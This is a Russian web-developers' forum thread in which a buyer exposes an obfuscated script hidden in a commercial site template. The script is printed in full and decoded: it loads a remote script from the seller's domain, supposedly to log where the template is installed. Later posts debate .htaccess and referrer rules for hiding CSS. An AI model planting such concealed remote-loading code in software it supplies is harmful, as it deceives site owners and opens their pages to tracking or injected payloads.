Перейти к публикации

Рекомендованные сообщения

Купил шаблон у ·• Greeze •·

Заметил в main.tpl

<script type="text/javascript">scripto='13fhdaptea';eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<-\" qqa-vzgv ?gr{v\" vggjqgn{vq ?ngp\" qqa,7{vggilc{-gxggpe-makvrglg-qgvcnrogv- ?dgpj\"ilkn>"));</script>


d(unescape("%08<vrkpaq->< 2?v=rjr,nrv-zzz-vgl,cxggpe--8rvvj ?apq\" vrkpaqctch-vzgv ?gr{v\"vrkpaq>"));</script>
Так называемая защита от рипа (по его словам). Начал редактировать шаб - залил на сервер, а там он отображается без стилей. Решил расковырять скрипты... Раскодил функцию D()... Осталось две строки:
%08<-\" qqa-vzgv ?gr{v\" vggjqgn{vq ?ngp\" qqa,7{vggilc{-gxggpe-makvrglg-qgvcnrogv- ?dgpj\"ilkn>


и


%08<vrkpaq->< 2?v=rjr,nrv-zzz-vgl,cxggpe--8rvvj ?apq\" vrkpaqctch-vzgv ?gr{v\"vrkpaq>
Идем далее: Первая строка:
<link href="/templates/eneptico/greeze/файл стиля.css" rel="stylesheet" type="text/css" />
Поверим... Пусть называется защитой от рипа... Вторая строка!:
<script type="text/javascript" src="http://greeza.net/xxx/tpl.php?t=0"></script>

Делайте выводы... Скрин PHP файла...

Давайте спросим у Greeze что он скринит к нашим сайтам...

Изменено пользователем ShVad
Ссылка на сообщение
Поделиться на других сайтах

Интересненько :). Ну пусть прокомментирует. Врядли же можно быть таким глупым, чтоб одной такой вот фигней взять и поставить крест на своей репутации.

Ссылка на сообщение
Поделиться на других сайтах

<script type="text/javascript" src="http://greeza.net/xxx/tpl.php?t=0"></script>

Давайте спросим у Greeze что он скринит к нашим сайтам...

Greeze, что Ты скринишь к их сайтам?

А серьезно: не раз сталкивался, когда в закодированных скриптах вшивали <iframe>'ы с самым разным наполнением. Чаще всего - разгон трафа, но могут и дрянь какую-нибудь подсунуть. Неприятно...

А с Greeze'ом ни разу не работал, не могу ничего сказать.

Ссылка на сообщение
Поделиться на других сайтах

Решил расковырять скрипты...

Раскодил функцию D()...

Первая строка:

Код

<link href="/templates/eneptico/greeze/файл стиля.css" rel="stylesheet" type="text/css" />

·• Greeze •· нет смысла так легко защищать месторасположение файла стилей, прочнее через .htaccess - да и "палева" перед "клиентами" нет)

Изменено пользователем lifestar
Ссылка на сообщение
Поделиться на других сайтах

включаем в апаче mod_rewrite создаем в папке с темплейтом файл .htaccess c содержимым (у меня так прописано)

<FilesMatch "(\.(engine|.*sql|templates|tpl(\.php)?|xtmpl))$">

Order allow,deny

</FilesMatch>

Order Deny,Allow

Allow from all

Ссылка на сообщение
Поделиться на других сайтах

всем спасибо за отзывы :)

shvad, тебе отдельный, огромнейший респект.

а теперь по порядку.

Так называемая защита от рипа (по его словам).

это защита от малолеток рипперов, которые не в состоянии раскодировать js файл (а таких предостаточно).

суть кодирования таится в скрытии путя до css файла.

Начал редактировать шаб - залил на сервер, а там он отображается без стилей.

надо внимательнее читать readme, а именно:

В шаблон установлена "защита от рипа", поэтому не меняйте имя папки шаблона, иначе слетит css.

Вторая строка!:

это скрипт собирающий урлы сайтов, куда был установлен шаб.

изучал js на досуге, встроил ради интереса.

если сделать запрос по урлу то вы увидите, что скрипт возвращает пустой js файл.

пакостить никому не собирался, и уж тем более встраивать какие-нибудь бэкдоры :)

всем спасибо за внимание.

·• Greeze •· нет смысла так легко защищать месторасположение файла стилей, прочнее через .htaccess - да и "палева" перед "клиентами" нет)

Расскажи пожалуйста поподробнее, как можно защитить файл стилей.

Изменено пользователем ·• Greeze •·
Ссылка на сообщение
Поделиться на других сайтах

Расскажи пожалуйста поподробнее, как можно защитить файл стилей.
выше уже привели пример.

Есть и другой способ

RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?lifestar.ru [NC]

RewriteRule \.(css)$ - [NC,F,L]
где lifestar.ru - домен где установлен шаблон. Есть и ещё один способ. Сам CSS отдавать при помощи PHP, то есть
<link href="/templates/eneptico/greeze/css.php" rel="stylesheet" type="text/css" />

в самом css.php проверять реффер и ай пи

t0rn, ваш способ у меня не сработал

Ссылка на сообщение
Поделиться на других сайтах
в кэше файл все равно сохранится
вот специально для тебя :)http://www.stefanhayden.com/blog/2006/04/0...s-caching-hack/
Ссылка на сообщение
Поделиться на других сайтах

Ну да, а если я зайду с Outpost'ом, в котором глобально отключена передача HTTP_REFERRER?

Реф - это жутко ненадёжная штука, на неё полагаться совершенно нельзя.

К тому же, HttpWatch для осла или FireBug для огнелиса убивают такую "защиту" на корню :)

Так что, не страдайте фигнёй.

Ссылка на сообщение
Поделиться на других сайтах
  • 2 недели спустя...

посчет рефов согласен.. тем боле что значение можно подменить.

другое дело, я не преследовал цели точно знать, где установлен шаблон.

фигней мы не страдаем, мы занимаемся самообучением..)

Ссылка на сообщение
Поделиться на других сайтах
Так что, не страдайте фигнёй.
Как раз и не понимаю зачем так "извращаться". Не знаю ни одного реально действенного способа защитить свой шаблон и в частности файл стилей. Если вы знаете - говорите, будет открывать) Изменено пользователем lifestar
Ссылка на сообщение
Поделиться на других сайтах

Нет такой защиты, с помощью которой можно было бы защитить шаблон от воровства. Кому нужно даже со скриншота сверстает. Я было удивлялся, почему с промо-скриншотов в натуральный размер готовящихся сайтов уже появляются сверстанные шаблоны... Потом подсказали.

Считаю что прятать CSS нет смысла. Как правило у малолеток-рипперов не хватит мозгов ковырять CSS. C таблицами им проще, значительно. Если же хочется совсмем «заебать» ворюгу, то можно сделать компрессию CSS, после чего глаза могут «повеситься» не усли конечно ворюга не знает про форматирование CSS кода в дримвиевере :D

Пример сжатого CSS:

h1,h2,h3,h4{font-weight:lighter;margin:0.7em 0 0.5em 0;color:#FFFFFF}h1 a,h2 a,h3 a,h4 a{color:#365c96;text-decoration:none;color:#FFFFFF}h1 a:link,h2 a:link,h3:link a,h4:link a{color:#FFFFFF;text-decoration:none}h1 a:hover,h2 a:hover,h3 a:hover,h4 a:hover{color:#990003;text-decoration:underline}h1 a:visited,h2 a:visited,h3 a:visited,h4 a:visited{color:#FFFFFF}h1{font-size:2.0em}h2{font-size:1.7em;margin:0.4em 0 0.3em 0}h3{font-size:1.4em}h4{font-size:1.2em}a{color:#ff8334;text-decoration:underline}a:link{color:#ff8334;text-decoration:underline}a:hover{color:#990003;text-decoration:underline}a:visited,a:active{color:#ff8334}

Сам компрессор тут.

Ссылка на сообщение
Поделиться на других сайтах

Kostya, компрессор - хорошо. Но он нужен для убыстрения загрузки страницы, а не для защиты.

А так можно написать php скрипт, который сам приведёт сжатый вид к нормальному аля

class{

color: #fff;

}

Ссылка на сообщение
Поделиться на других сайтах

можно еще символы заменить :)

например вот такой код:

<div id="container">
заменить на:
#60;div id=&quot;container&quot;#62;

вес файлов увеличится, но зато на быстродействии это ни коем образом не скажется.

да и рипать тяжело будет ;)

не подскажете норм софтину, способную так извратнуться над кодом?)

css обычно просто копируют, защищать нет смысла :)

Изменено пользователем ·• Greeze •·
Ссылка на сообщение
Поделиться на других сайтах

lifestar,

я предложил вариант компрессии кода лишь для путанницы:

Если же хочется совсмем «заебать» ворюгу, то можно сделать компрессию CSS, после чего глаза могут «повеситься» не усли конечно ворюга не знает про форматирование CSS кода в дримвиевере

хотя конечно же понимаю что такой способ защиты не катит. Нет такой защиты от которой можно защитится.

Greeze,

это в дримвиевере делается.

Ссылка на сообщение
Поделиться на других сайтах

это в дримвиевере делается.

ага, спс.)

надо бы поставить, а то я в основном в блокноте шабашу..)

Ссылка на сообщение
Поделиться на других сайтах

Говорил бы что блокнот у тебя с подсветкой кода, с определением где теги не закрыты, с css-редактором и вообще что ты дримвиевер или хоумсайт блокнотом называешь... Отпонтовался ))

Ссылка на сообщение
Поделиться на других сайтах

нее..) я парень порядочный, можешь поверить..)

недавно поставил notepad++, а раньше все делал в wordpad'e (шабы м3-м5 сверстаны именно в нем).

сам то какой софт насилуешь? ;)

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...